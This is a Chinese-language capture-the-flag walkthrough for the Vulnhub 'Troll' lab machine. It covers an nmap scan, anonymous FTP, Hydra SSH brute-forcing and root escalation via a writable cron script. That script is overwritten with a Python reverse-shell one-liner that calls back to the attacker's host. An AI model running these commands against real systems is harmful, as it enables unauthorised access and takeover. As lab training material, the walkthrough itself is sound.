信息收集
| IP Address | Ports Opening |
|---|---|
| 192.168.8.104 | TCP:21,22,80 |
$ nmap -sC -sV 192.168.8.104 -p- --min-rate 1000
Nmap scan report for 192.168.8.104 (192.168.8.104)
Host is up (0.0042s latency).
Not shown: 65532 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.2
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rwxrwxrwx 1 1000 0 8068 Aug 10 2014 lol.pcap [NSE: writeable]
| ftp-syst:
| STAT:
| FTP server status:
| Connected to 192.168.8.107
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 600
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.2 - secure, fast, stable
|_End of status
22/tcp open ssh OpenSSH 6.6.1p1 Ubuntu 2ubuntu2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 1024 d6:18:d9:ef:75:d3:1c:29:be:14:b5:2b:18:54:a9:c0 (DSA)
| 2048 ee:8c:64:87:44:39:53:8c:24:fe:9d:39:a9:ad:ea:db (RSA)
| 256 0e:66:e6:50:cf:56:3b:9c:67:8b:5f:56:ca:ae:6b:f4 (ECDSA)
|_ 256 b2:8b:e2:46:5c:ef:fd:dc:72:f7:10:7e:04:5f:25:85 (ED25519)
80/tcp open http Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 1 disallowed entry
|_/secret
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.7 (Ubuntu)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
FTP匿名登录
ftp匿名登录
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图](https://img.4awl.net/img/54/8c121bd976c1887aab015ebb3c59e0.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图")
使用wireshark打开
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图1](https://img.4awl.net/img/07/b91b7286c3d5d8a50d9855fcf3737d.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图1")
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图2](https://img.4awl.net/img/bf/422d6903cd41b6bfe0a7cdfb24e9aa.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图2")
Well, well, well, aren't you just a clever little devil, you almost found the sup3rs3cr3tdirlol :-P
Sucks, you were so close... gotta TRY HARDER!
http://192.168.8.104/sup3rs3cr3tdirlol/
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图3](https://img.4awl.net/img/ae/5575fda07603eab943861ed389170f.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图3")
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图4](https://img.4awl.net/img/b3/af78eb868e8ea0c3de5dd199df77f8.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图4")
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图5](https://img.4awl.net/img/02/2937cbb2b42edd46aca53783722951.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图5")
将账号保存
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图6](https://img.4awl.net/img/37/e746caacf152417639c6e79e192536.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图6")
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图7](https://img.4awl.net/img/7d/7d0f28d290d274b7216ac824877469.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图7")
密码
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图8](https://img.4awl.net/img/12/e516e85cd7d3dbe0faf5a4ba558772.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图8")
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图9](https://img.4awl.net/img/86/4ea1ccc53af277725d33698022b228.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图9")
$ hydra -s 22 -v -V -L user.txt -p "Good_job_:)" -e n -t 1 -w 30 192.168.8.104 ssh
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图10](https://img.4awl.net/img/82/e142dc99f21b4b5333af539677ab92.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图10")
服务器检测到爆破ssh行为就会封禁IP,测试下来发现密码不正确,尝试密码Pass.txt
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图11](https://img.4awl.net/img/0b/840ac03532e9f67802b5c493f6e47e.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图11")
username:overflowpassword:Pass.txt
SSH
$ ssh [email protected]
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图12](https://img.4awl.net/img/0c/520120c4143ff23e4c416c7c1ea138.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图12")
有趣的是两分钟后,你将会被自动踢下线
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图13](https://img.4awl.net/img/8c/bb781bbaa6c9da2a2ac30d947fd538.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图13")
Local.txt 截屏
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图14](https://img.4awl.net/img/09/bcc0df35c42a7ebe534fd3d9750598.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图14")
Local.txt 内容
d637cc968971b87d5b575ddfe2d50408
权限提升
通过目录搜索
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图15](https://img.4awl.net/img/16/7610f2207225bb1e14a506c5dd1154.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图15")
日志中描述了存在一个两分钟的定时任务
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图16](https://img.4awl.net/img/3d/8beda1904a72cbb54bf9a64dc8af09.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图16")
$ find / -name cleaner.py
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图17](https://img.4awl.net/img/d2/43c65820ae0199e9fcce032b41628f.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图17")
$ ls -la /lib/log/cleaner.py
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图18](https://img.4awl.net/img/05/2dbe943c41e5989bda85988c490d43.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图18")
$ nano /lib/log/cleaner.py
import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.8.107",10033));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图19](https://img.4awl.net/img/47/e68accf4d5b23a4a03237cf28f871d.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图19")
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图20](https://img.4awl.net/img/e8/71dd5f3d46f38551da2ccd1c987b68.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图20")
Proot 截屏
![[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图21](https://img.4awl.net/img/5e/94259ad4995c7bf018a7156e264f10.jpg "[Vulnhub] Troll FTP匿名登录+定时任务权限提升插图21")
Proot 内容
76535a590a2cd3cc48faa472c3831914
4A评测 - 免责申明
本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。
不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。
本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。
如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!
程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。
侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)
